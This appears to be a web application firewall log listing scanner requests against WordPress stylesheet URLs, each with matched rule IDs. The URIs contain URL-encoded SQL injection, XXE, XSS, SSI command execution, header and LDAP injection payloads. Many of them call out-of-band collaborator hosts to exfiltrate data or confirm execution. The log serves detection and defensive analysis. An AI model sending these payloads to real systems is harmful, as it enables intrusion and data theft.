Packet [293]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&(select*from(select(sleep(20)))a)=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [294]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1%20and%20(select*from(select(sleep(20)))a)--%20=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942150]	[942200]	[942410]	[942440]	[942431]
Packet [295]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1%20into%20outfile%20'%5c%5c%5c%5cl7tdfx4ats6fa7c8lkgamii4cvit6kubyzsmia7.burpcollaborator.net%5c%5cpde'%3b%20--%20=1]	Nattacks [5 ]	Signatures	[942190]	[942260]	[942370]	[942480]	[942440]
Packet [296]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1%20waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [5 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]
Packet [297]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1%2b(select*from(select(sleep(20)))a)%2b=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [298]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1%2c0)waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [6 ]	Signatures	[942280]	[942200]	[942300]	[942440]	[942490]	[942431]
Packet [299]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c2beuje8rx9aweogpp1krqzmlgcmaa1ysogi38rx.burpcollab'%2b'orator.net%5cvmt'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [300]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cuwum46tji1vozg1hat5jbr7d1472vtjk983vtji.burpcollab'%2b'orator.net%5cmxg'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [302]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1'%2b(select%20load_file('%5c%5c%5c%5c2y1u6evrk9xw1o3pc17rdz9l3c9ax1lsogi38rx.burpcollaborator.net%5c%5cjzm'))%2b'=1]	Nattacks [10 ]	Signatures	[942360]	[942110]	[942150]	[942260]	[942310]	[942370]	[942410]	[942490]	[942431]	[942511]
Packet [303]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c8gp0okdx2ff2julvu7pxv5rrlirgf73yumo9ex3.burpcollab'%2b'orator.net%5cuut'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [304]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20cjvhm%20SYSTEM%20%22http%3a%2f%2fd5j5dp22rk478za0jce2kagwangl4csgga30rp.burpcollab'%7c%7c'orator.net%2f%22%3e%25cjvhm%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [19 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [305]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20hlkam%20SYSTEM%20%22http%3a%2f%2f121tadzqo81v5n7og0bqhydk7bd910p4dy0ood.burpcollab'%7c%7c'orator.net%2f%22%3e%25hlkam%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [19 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [306]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1')%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cyy0q6avnk5xs1k3lcx7ndv9h3896xxloec8zynn.burpcollab'%2b'orator.net%5cqwp'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [307]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1'=1]	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [308]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cqzti72wflxyk2c4ddp8fena940ayypmge48ryfn.burpcollab'%2b'orator.net%5cyti'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [309]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&1)waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [5 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]
Packet [310]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&113665256%20or%209572%3d09572=1]	Nattacks [1 ]	Signatures	[942390]
Packet [311]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fho99wtl6aonbr3t42gx63ez0trzpngb82wwjm7bX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [314]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%20and%20'1937'%3d'1943]	Nattacks [7 ]	Signatures	[942180]	[942330]	[942340]	[942370]	[942400]	[942490]	[942511]
Packet [315]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%20and%20'4731'%3d'4731]	Nattacks [8 ]	Signatures	[942130]	[942180]	[942330]	[942340]	[942370]	[942400]	[942490]	[942511]
Packet [316]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%20and%20(select*from(select(sleep(20)))a)--%20]	Nattacks [10 ]	Signatures	[933161]	[942160]	[942150]	[942200]	[942370]	[942410]	[942430]	[942440]	[942431]	[942460]
Packet [317]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%20and%206667%3d6667--%20]	Nattacks [5 ]	Signatures	[942130]	[942180]	[942330]	[942400]	[942440]
Packet [318]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%20and%209527%3d9534--%20]	Nattacks [4 ]	Signatures	[942180]	[942330]	[942400]	[942440]
Packet [319]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%20waitfor%20delay'0%3a0%3a20'--]	Nattacks [6 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]	[942511]
Packet [320]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%22%600%26nslookup%20-q%3dcname%20umkmu6jj81lopgrh0tvj1rxdr4x2lt9qxhk78w.burpcollaborator.net.%26%60']	Nattacks [8 ]	Signatures	[932105]	[932110]	[942110]	[942260]	[942330]	[942490]	[942431]	[942460]
Packet [321]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%2b(select%20load_file('%5c%5c%5c%5cf6m7er34sm5991b2kef4lchybphn5et5wtngd42.burpcollaborator.net%5c%5czqz'))%2b']	Nattacks [10 ]	Signatures	[942360]	[942110]	[942150]	[942260]	[942310]	[942370]	[942410]	[942431]	[942460]	[942511]
Packet [322]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%2b(select*from(select(sleep(20)))a)%2b']	Nattacks [8 ]	Signatures	[933161]	[942160]	[942360]	[942110]	[942150]	[942200]	[942410]	[942431]
Packet [323]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%2beval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20time.sleep(20)'%2c'a'%2c'single'))%2b']	Nattacks [14 ]	Signatures	[933160]	[933161]	[934100]	[934100]	[942160]	[942110]	[942150]	[942200]	[942370]	[942410]	[942430]	[942431]	[942460]	[942511]
Packet [324]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%2bsleep(20.to_i)%2b']	Nattacks [4 ]	Signatures	[933161]	[942110]	[942150]	[942410]
Packet [325]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%2c0)waitfor%20delay'0%3a0%3a20'--]	Nattacks [7 ]	Signatures	[942280]	[942200]	[942300]	[942370]	[942440]	[942490]	[942431]
Packet [326]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c3w0v4ftsiavxzp1qa25sb07m1d7bv2jtah14rsg.burpcollab'%2b'orator.net%5clrz'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20]	Nattacks [15 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]	[942460]
Packet [327]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20grvcl%20SYSTEM%20%22http%3a%2f%2ffve73rs4hmu9y1029e44ac6y0p6nueii69tzho.burpcollab'%7c%7c'orator.net%2f%22%3e%25grvcl%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c']	Nattacks [20 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]	[942460]
Packet [328]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'(select*from(select(sleep(20)))a)']	Nattacks [8 ]	Signatures	[933161]	[942160]	[942360]	[942110]	[942150]	[942200]	[942410]	[942431]
Packet [329]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0')%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5clwld4xtaisvfz718ak5abi741v7tvkjbcz3mtai.burpcollab'%2b'orator.net%5cgim'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]	[942460]
Packet [330]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0')waitfor%20delay'0%3a0%3a20'--]	Nattacks [6 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]	[942511]
Packet [331]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0'.sleep(20).']	Nattacks [5 ]	Signatures	[933161]	[942160]	[942110]	[942150]	[942410]
Packet [332]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cn6ufez3csu5h99bakmfclkh6bxhv5mtdl1co2cr.burpcollab'%2b'orator.net%5cqyg'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]	[942460]
Packet [334]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.047685267'%20or%203570%3d3575--%20]	Nattacks [4 ]	Signatures	[942180]	[942330]	[942390]	[942440]
Packet [335]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.070247388'%20or%20'2344'%3d'2349]	Nattacks [7 ]	Signatures	[942180]	[942330]	[942340]	[942370]	[942390]	[942490]	[942511]
Packet [336]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.078407882'%20or%205400%3d5400--%20]	Nattacks [5 ]	Signatures	[942130]	[942180]	[942330]	[942390]	[942440]
Packet [337]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.093192669'%20or%20'1162'%3d'1162]	Nattacks [8 ]	Signatures	[942130]	[942180]	[942330]	[942340]	[942370]	[942390]	[942490]	[942511]
Packet [338]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0iszz8%25%3ej8sol'%2f%22%3cu9lco]	Nattacks [4 ]	Signatures	[920220]	[920272]	[942370]	[942460]
Packet [341]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=eval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20time.sleep(20)'%2c'a'%2c'single'))]	Nattacks [12 ]	Signatures	[933160]	[933161]	[934100]	[942160]	[942150]	[942200]	[942370]	[942410]	[942430]	[942431]	[942460]	[942511]
Packet [343]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=Http%3a%2f%2f7jrzrjgw5ei1mtoux6swy4uqohufi66z8nzapye.burpcollaborator.net%2f%3f1.0]	Nattacks [1 ]	Signatures	[931130]
Packet [344]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=http%3a%2f%2fhav9it76wo9bd3f4ogj6pel0frlp9gx6lx8nwc.burpcollaborator.net%2f%3f1.0]	Nattacks [1 ]	Signatures	[931130]
Packet [345]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=https%3a%2f%2fo5ugd02drv4i8aabjnedklg7aygw4nseg53vrk.burpcollaborator.net%2f%3f1.0]	Nattacks [1 ]	Signatures	[931130]
Packet [346]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=in6hyaqghq)(objectClass%3d*]	Nattacks [1 ]	Signatures	[921200]
Packet [347]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fa2d2amzzoh145w7xg9bzh7dt7kdi19p1gp7cx0mX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e]	Nattacks [18 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]	[942460]
Packet [348]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=mq7aa3rem2)(!(objectClass%3d*)]	Nattacks [3 ]	Signatures	[921200]	[942431]	[942460]
Packet [363]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver='%22%3e%3csvg%2fonload%3dfetch%60%2f%2f6ahyii7vwd90dsfto5jvp3lpfgle9bx3nree42t%5c.burpcollaborator.net%60%3e]	Nattacks [8 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942490]	[942431]	[942460]
Packet [365]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&%22--%3e'--%3e%60--%3e%3c!--%23set%20var%3d%227mg%22%20value%3d%226lfytiiv7d%22--%3e%3c!--%23set%20var%3d%229oi%22%20value%3d%228nh0vkkx9f%22--%3e%3c!--%23echo%20var%3d%227mg%22--%3e%3c!--%23echo%20var%3d%229oi%22--%3e%3c!--%23exec%20cmd%3d%22nslookup%20-q%3dcname%20t82lg55iu07nbfdgmshinqjcd3j17yvqten1dp2.burpcollaborator.net%22%20--%3e=1]	Nattacks [9 ]	Signatures	[941160]	[941180]	[942110]	[942260]	[942300]	[942370]	[942430]	[942440]	[942431]
Packet [366]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&'%22%3e%3csvg%2fonload%3dfetch%60%2f%2facq2km9zyhb4fwhxq9lzr7nthknibfz7pvji96y%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [367]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fpslh01peewrjvbxc6o1e7m38xz3xrufm5azxple%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [368]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&(function()%7bif(typeof%20cy06s%3d%3d%3d'undefined')%7bvar%20a%3dnew%20Date()%3bdo%7bvar%20b%3dnew%20Date()%3b%7dwhile(b-a%3c20000)%3bcy06s%3d1%3b%7d%7d())=1]	Nattacks [9 ]	Signatures	[932140]	[933161]	[934100]	[942130]	[942150]	[942410]	[942430]	[942431]	[942511]
Packet [369]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20luvbw%20SYSTEM%20%22http%3a%2f%2fwxxo58ulj3wq0i2jbv6lct8f2684w1k48yvojd.burpcollab'%7c%7c'orator.net%2f%22%3e%25luvbw%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [370]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&(select%20load_file('%5c%5c%5c%5cd4i5cp12qk377z90icd2jafw9nfl3ir9txnkd82.burpcollaborator.net%5c%5czdl'))=1]	Nattacks [6 ]	Signatures	[942360]	[942150]	[942260]	[942310]	[942410]	[942431]
Packet [371]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&(select*from(select(sleep(20)))a)=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [372]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%0d%0aBCC%3ajj6brvg85qidm5o6xis8ygu2oturio6gz4trjf8@burpcollaborator.net%0d%0ajkk%3a%20p=1]	Nattacks [2 ]	Signatures	[920272]	[921150]
Packet [373]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%20and%20(select*from(select(sleep(20)))a)--%20=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942150]	[942200]	[942410]	[942440]	[942431]
Packet [374]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%20and%203594%3d3596=1]	Nattacks [1 ]	Signatures	[942400]
Packet [375]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%20and%205632%3d05632=1]	Nattacks [1 ]	Signatures	[942400]
Packet [376]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%20and%206130%3d6134--%20=1]	Nattacks [2 ]	Signatures	[942400]	[942440]
Packet [377]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%20and%208210%3d08210--%20=1]	Nattacks [2 ]	Signatures	[942400]	[942440]
Packet [378]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%20into%20outfile%20'%5c%5c%5c%5czilrqbfo46htllnmwyroxwtin9t7h45v9j36tui.burpcollaborator.net%5c%5csvb'%3b%20--%20=1]	Nattacks [5 ]	Signatures	[942190]	[942260]	[942370]	[942480]	[942440]
Packet [379]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%20waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [5 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]
Packet [380]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%22=1]	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [381]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%25%7dgv84l'%2f%22%3cuev6b=1]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [382]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%2b(select*from(select(sleep(20)))a)%2b=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [383]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%2c0)waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [6 ]	Signatures	[942280]	[942200]	[942300]	[942440]	[942490]	[942431]
Packet [384]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5ccm24uoj18jl6pyrz0bv119xvrmxklh98zwtjj78.burpcollab'%2b'orator.net%5ciqb'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [385]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1%3e%0d%0aBCC%3aw1yo98yln30q4i6jfvalgtcf66c401otihc42sr@burpcollaborator.net%0d%0ahoa%3a%20f=1]	Nattacks [3 ]	Signatures	[920272]	[921150]	[942130]
Packet [387]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1'%20and%20'3425'%3d'3430=1]	Nattacks [7 ]	Signatures	[942180]	[942330]	[942340]	[942370]	[942400]	[942490]	[942511]
Packet [388]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1'%20and%20'5324'%3d'5324=1]	Nattacks [8 ]	Signatures	[942130]	[942180]	[942330]	[942340]	[942370]	[942400]	[942490]	[942511]
Packet [389]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1'%20and%202686%3d2686--%20=1]	Nattacks [5 ]	Signatures	[942130]	[942180]	[942330]	[942400]	[942440]
Packet [390]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1'%20and%203336%3d3341--%20=1]	Nattacks [4 ]	Signatures	[942180]	[942330]	[942400]	[942440]
Packet [391]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1'%2b(function()%7bif(typeof%20haq5e%3d%3d%3d%22undefined%22)%7bvar%20a%3dnew%20Date()%3bdo%7bvar%20b%3dnew%20Date()%3b%7dwhile(b-a%3c20000)%3bhaq5e%3d1%3b%7d%7d())%2b'=1]	Nattacks [11 ]	Signatures	[932140]	[933161]	[934100]	[934100]	[942110]	[942130]	[942130]	[942150]	[942410]	[942430]	[942431]
Packet [392]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1'%2b(select%20load_file('%5c%5c%5c%5cj1lb9vy8nq0d4566fia8ggc26tcr0oofr3lqbe0.burpcollaborator.net%5c%5clid'))%2b'=1]	Nattacks [9 ]	Signatures	[942360]	[942110]	[942150]	[942260]	[942310]	[942370]	[942410]	[942431]	[942511]
Packet [393]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cqnhiv2kf9xmkqcsd1pwf2ny9s0yymvam1avxlla.burpcollab'%2b'orator.net%5ctxa'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [394]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20luvbw%20SYSTEM%20%22http%3a%2f%2fcvb43os1hju6yy0z9b41a96v0m6kuhil6ft5hu.burpcollab'%7c%7c'orator.net%2f%22%3e%25luvbw%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [19 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [395]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1')%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cgsc80sp5enrav2x36f157d3zxq3orlfc802nsbh.burpcollab'%2b'orator.net%5cscs'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [396]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1'=1]	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [397]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c3osvwflsaanxrptq22xs30zmtdzbn8bz3nxanyc.burpcollab'%2b'orator.net%5ceht'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [398]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1)waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [5 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]
Packet [399]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&123668473%20or%201256%3d1262--%20=1]	Nattacks [2 ]	Signatures	[942390]	[942440]
Packet [400]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&134890436'%20or%208258%3d8266--%20=1]	Nattacks [4 ]	Signatures	[942180]	[942330]	[942390]	[942440]
Packet [401]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&138018292%20or%202957%3d02957=1]	Nattacks [1 ]	Signatures	[942390]
Packet [402]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&156867792'%20or%205975%3d5975--%20=1]	Nattacks [5 ]	Signatures	[942130]	[942180]	[942330]	[942390]	[942440]
Packet [403]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&160281486%20or%203023%3d3027=1]	Nattacks [1 ]	Signatures	[942390]
Packet [404]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&177054077%20or%204509%3d04509--%20=1]	Nattacks [2 ]	Signatures	[942390]	[942440]
Packet [405]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&179792951'%20or%20'3089'%3d'3089=1]	Nattacks [8 ]	Signatures	[942130]	[942180]	[942330]	[942340]	[942370]	[942390]	[942490]	[942511]
Packet [406]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&180325326'%20or%20'6466'%3d'6470=1]	Nattacks [7 ]	Signatures	[942180]	[942330]	[942340]	[942370]	[942390]	[942490]	[942511]
Packet [407]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&1lcl9a%25%3eoku1k'%2f%22%3cpgaoz=1]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942370]
Packet [410]	Uri [/web/wp-includes/blocks/navigation/style.min.css?ver=5.9&eval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20time.sleep(20)'%2c'a'%2c'single'))=1]	Nattacks [11 ]	Signatures	[933160]	[933161]	[934100]	[942160]	[942150]	[942200]	[942370]	[942410]	[942430]	[942431]	[942511]
